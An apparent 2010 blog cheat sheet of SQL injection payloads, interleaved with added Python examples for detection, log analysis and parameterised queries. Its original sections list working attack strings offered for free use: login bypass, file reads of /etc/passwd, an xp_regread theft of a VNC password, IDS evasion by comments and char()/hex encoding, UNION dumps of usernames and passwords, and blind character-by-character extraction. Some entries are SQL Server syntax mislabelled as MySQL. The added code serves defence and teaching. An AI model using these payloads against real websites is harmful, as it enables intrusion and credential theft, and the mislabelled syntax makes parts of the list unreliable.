MySQL Injection deep analysis


#feel free to use this information however you like
#no copyright, no nothing

#The purpose of this article is to list the main SQL injection techniques
#that apply to the MySQL database software


Index

1.  Data types
2.  Vulnerability test
3.  Information gathering
4.  MySQL OS
5.  Server name and configuration
6.  VNC password via the system registry
7.  IDS signature evasion
8.  Bypassing input validation using char()
9.  IDS signature evasion using comments
10. Strings without quotes
11. Comments
12. Counting the columns
13. Testing the UNION function
14. Database version
15. Table and column names in MySQL < 5
16. Tables and columns in MySQL 5
17. Blind



1. Data types

  • mysql.user
  • mysql.host
  • mysql.db


2. Vulnerability test

  • Login: ' or 1=1--
  • Pass: ' or 1=1--
  • http://website/index.asp?id=' or 1=1--
  • ' having 1=1--
  • ' group by userid having 1=1--
  • ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
  • ' union select sum(columnname) from tablename--


3. Information gathering

  • ' or 1 in (select @@version)--
  • ' union all select @@version--


4. MySQL OS

  • ' union select 1,load_file('/etc/passwd'),1,1,1;


5. Server name and configuration

  • ' and 1 in (select @@servername)--


6. VNC password via the system registry

'; declare @out binary(8)
exec master..xp_regread
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\ORL\WinVNC3\Default',
@value_name='password',
@value = @out output
select cast (@out as bigint) as x into TEMP--
' and 1 in (select cast(x as varchar) from temp)--


7. IDS signature evasion

Evading ' OR 1=1

  • ' OR 'unusual' = 'unusual'
  • ' OR 'something' = 'some'+'thing'
  • ' OR 'text' = N'text'
  • ' OR 'something' like 'some%'
  • ' OR 2 > 1
  • ' OR 'text' > 't'
  • ' OR 'whatever' in ('whatever')
  • ' OR 2 BETWEEN 1 and 3


8. Bypassing input validation using char()

Injection without quotes (string = "%"):
--> ' or username like char(37);
Injection with quotes (string = "root"):
--> ' union select * from users where login = char(114,111,111,116);
Loading a file via union (string = "/etc/passwd"):
--> ' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Checking whether a file exists (string = "n.ext"):
--> ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));


9. IDS signature evasion using comments

  • '/**/OR/**/1/**/=/**/1
  • Username: ' or 1/*
  • Password: */=1--
  • UNI/**/ON SEL/**/ECT


10. Strings without quotes

--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
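The evasions in sections 7 to 10 all rely on the inspection layer matching the raw request text, while the database sees something else. A signature check therefore has to canonicalise first: strip inline comments, decode char()/hex-encoded literals, collapse whitespace, and only then look for keywords. The following added example (not part of the original post) shows that normalisation step in Python over constructed parameter values built from the payload shapes listed above; the signature names and the indicator list are this example's own choices, not an existing product's rule set.

```python
import re

# Constructed sample parameter values (already URL-decoded), built from the
# payload shapes in sections 7-10 above.  They are fixtures for this example,
# not captured traffic.
SAMPLES = {
    "plain_union":   "5 union select 1,load_file('/etc/passwd'),1,1,1",
    "char_literal":  "' union select * from users where login = char(114,111,111,116)",
    "comment_gaps":  "'/**/OR/**/1/**/=/**/1",
    "split_keyword": "UNI/**/ON SEL/**/ECT 1,2,3",
    "open_comment":  "' or 1/*",
    "hex_concat":    "char(0x70) + char(0x65) + char(0x74), 0x64",
    "hex_in_union":  "5 union all select 1,concat(username,0x3a,password),3 from admin/*",
    "benign":        "O'Reilly and sons",
}

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
OPEN_COMMENT = re.compile(r"/\*.*$", re.DOTALL)        # unterminated /* hides the rest of the value
CHAR_CALL = re.compile(r"\bchar\s*\(\s*([0-9a-fx, ]+?)\s*\)", re.I)
HEX_STRING = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)   # even-length 0x... is a string in MySQL


def _char_to_literal(m):
    """char(114,111,111,116) -> 'root', char(0x70) -> 'p'."""
    chars = []
    for tok in m.group(1).split(","):
        tok = tok.strip()
        try:
            code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
        except ValueError:
            return m.group(0)          # not a plain code list: leave untouched
        chars.append(chr(code & 0xFF))
    return "'" + "".join(chars) + "'"


def _hex_to_literal(m):
    """0x3a -> ':' ; 0x726f6f74 -> 'root'."""
    return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"


def normalize(value):
    """Canonical forms of a request value with comment and char()/hex
    obfuscation undone.  Two forms are produced because a /**/ gap may stand
    for a space (OR/**/1) or for nothing at all (UNI/**/ON)."""
    forms = []
    for gap in (" ", ""):
        v = INLINE_COMMENT.sub(gap, value)
        v = OPEN_COMMENT.sub(" ", v)
        v = CHAR_CALL.sub(_char_to_literal, v)
        v = HEX_STRING.sub(_hex_to_literal, v)
        forms.append(re.sub(r"\s+", " ", v).strip().lower())
    return forms


# Signatures are matched against the normalized forms, never the raw value.
SIGNATURES = {
    "union_select":  re.compile(r"\bunion\b\s*(?:all\s*)?select\b"),
    "or_tautology":  re.compile(r"\bor\s*(\d+)\s*=\s*\1(?!\d)|\bor\s*'([^']*)'\s*=\s*'\2'"),
    "load_file":     re.compile(r"\bload_file\s*\("),
    "version_probe": re.compile(r"@@version"),
    "schema_probe":  re.compile(r"\binformation_schema\."),
}


def analyze(value):
    """Return the list of indicator names that fire for one parameter value."""
    findings = []
    if re.search(r"/\*|--", value):                      # comment token in user input
        findings.append("sql_comment")
    if CHAR_CALL.search(value) or HEX_STRING.search(value):
        findings.append("encoded_literal")               # string hidden behind char()/0x..
    for form in normalize(value):
        for name, rx in SIGNATURES.items():
            if name not in findings and rx.search(form):
                findings.append(name)
    return findings


if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:14} raw={value!r}")
        print(f"{'':14} normalized={normalize(value)[0]!r} -> {analyze(value)}")
```

Run stand-alone it prints each fixture, its first normalised form and the indicators that fired. Note what the raw-text approach would miss: `UNI/**/ON SEL/**/ECT` only becomes `union select` in the comment-removed form, and `char(114,111,111,116)` only becomes `'root'` after decoding; the `' or 1/*` fragment fires nothing but the comment-token indicator, which is why that indicator is kept as a finding in its own right.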


11. Comments

' /* '
' -- '


12. Counting the columns

order by n
at the first error, n-1 is the number of columns


13. Testing the UNION function

union all select null,null,null/*


14. Database version

union all select 1,@@version,3
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*


15. Table and column names in MySQL < 5

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*


16. Tables and columns in MySQL 5

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
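Every `news.php?id=5 union all select ...` request in sections 14 to 16 works for one reason: the `id` value is pasted into the SQL text, so the database parses attacker input as part of the statement. The following added example (not code from the original post) puts the vulnerable handler beside its fixed form. It uses sqlite3 as an in-memory stand-in for MySQL (an assumption made so the example runs offline; the `or 1=1` and `union all select` shapes behave the same in both), with constructed table contents and a placeholder password value.

```python
import sqlite3


def build_db():
    """In-memory stand-in for the site's database (assumption: sqlite3 plays
    the role of MySQL here).  All rows are constructed fixture data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO news VALUES (5, 'Release notes', 'public text');
        INSERT INTO news VALUES (6, 'Draft', 'unpublished text');
        INSERT INTO users VALUES ('admin', 'constructed-placeholder-hash');
    """)
    return conn


def vulnerable_lookup(conn, raw_id):
    """news.php?id=... built by string concatenation: the parameter becomes
    part of the SQL text, so 'union all select' or 'or 1=1' rewrites the query."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, raw_id):
    """Same lookup with the two controls that remove the bug: validate the
    expected type, then bind the value as a parameter so it is never parsed
    as SQL.  (With PyMySQL or mysqlclient the placeholder is %s, not ?.)"""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def run_both(raw_id):
    """Feed one request value to both handlers and return
    (rows from the vulnerable handler, rows from the hardened handler or 'rejected')."""
    conn = build_db()
    vulnerable = vulnerable_lookup(conn, raw_id)
    try:
        hardened = hardened_lookup(conn, raw_id)
    except ValueError:
        hardened = "rejected"
    return vulnerable, hardened


if __name__ == "__main__":
    for value in ("5", "5 or 1=1", "5 union all select 1,username,3 from users"):
        print(repr(value), "->", run_both(value))
```

The legitimate value `5` gives the same row from both handlers. The two payload shapes from the post return extra rows (the unpublished article, then the users table) from the concatenating handler and are refused outright by the parameterised one, before any SQL is executed. The type check is the cheap early exit; the bound parameter is the control that still holds when the input is a free-text field where a whitelist is not possible.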

17. Blind

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
http://www.site.com/news.php?id=5 and (select 1)=1
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
First character of the first row of the users table:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
Increase the comparison value after > until the result is false; for the second character:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
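The blind procedure just described leaves a distinctive trace in the web server log: one client, one path, one parameter, and the same `substring(..., pos, 1)` position compared against a changing value, with the response size flipping when the comparison turns false. The following added example (not from the original post) groups requests that way and raises an alert per probed position. The access-log excerpt is constructed fixture data in Apache's common format, built from the URLs above; the alert fields and the threshold of three distinct comparison values are this example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log excerpt (Apache-style) reproducing the probe sequence
# above: one client keeps raising the comparison value for character position 1
# until the page flips to the "false" response (note the size change), then
# moves on to position 2.  Fixture data, not real traffic.
LOG = """\
203.0.113.7 - - [16/Jan/2010:10:00:01 +0100] "GET /news.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2010:10:00:02 +0100] "GET /news.php?id=5%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2010:10:00:03 +0100] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2010:10:00:04 +0100] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>90 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2010:10:00:05 +0100] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>100 HTTP/1.1" 200 218
203.0.113.7 - - [16/Jan/2010:10:00:06 +0100] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),2,1))>99 HTTP/1.1" 200 5120
198.51.100.2 - - [16/Jan/2010:10:00:07 +0100] "GET /news.php?id=7 HTTP/1.1" 200 4800
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
# position and comparison value of a substring(...,pos,1) <op> N probe
PROBE = re.compile(r"substring\(.*?,(\d+),1\)\)?\s*([<>=])\s*(\d+)", re.I)


def parse_probes(log_text):
    """Yield one record per request whose query string carries a substring(...)
    comparison: (client, path, param, position, op, value, response_size)."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        for param, values in parse_qs(url.query).items():   # parse_qs also URL-decodes
            for value in values:
                p = PROBE.search(value)
                if p:
                    yield client, url.path, param, int(p.group(1)), p.group(2), int(p.group(3)), int(size)


def find_blind_extraction(log_text, min_values=3):
    """Group probes per (client, path, parameter, position).  The same position
    compared against several different values is the character-by-character
    loop described above; two distinct response sizes confirm the true/false oracle."""
    buckets = defaultdict(list)
    for client, path, param, pos, op, value, size in parse_probes(log_text):
        buckets[(client, path, param, pos)].append((op, value, size))
    alerts = []
    for (client, path, param, pos), hits in sorted(buckets.items()):
        values = sorted({v for _, v, _ in hits})
        if len(values) >= min_values:
            alerts.append({
                "client": client, "path": path, "param": param, "position": pos,
                "probes": len(hits), "values": values,
                "response_sizes": sorted({s for _, _, s in hits}),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_blind_extraction(LOG):
        print(alert)
```

On the fixture this yields a single alert for client 203.0.113.7, parameter `id`, position 1, with four probes and the two response sizes 5120 and 218; position 2 has only been probed once and stays below the threshold. Each request on its own is just another odd `id` value, so a per-request signature such as the one for `@@version` would catch only the first line; the grouping by position is what exposes the extraction loop, and the pair of response sizes is the same oracle the attacker relies on, now visible to the defender.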

#last revised 16/01/2010
#thanks to: * the good guys 🙂

This entry was posted in WebApp Security.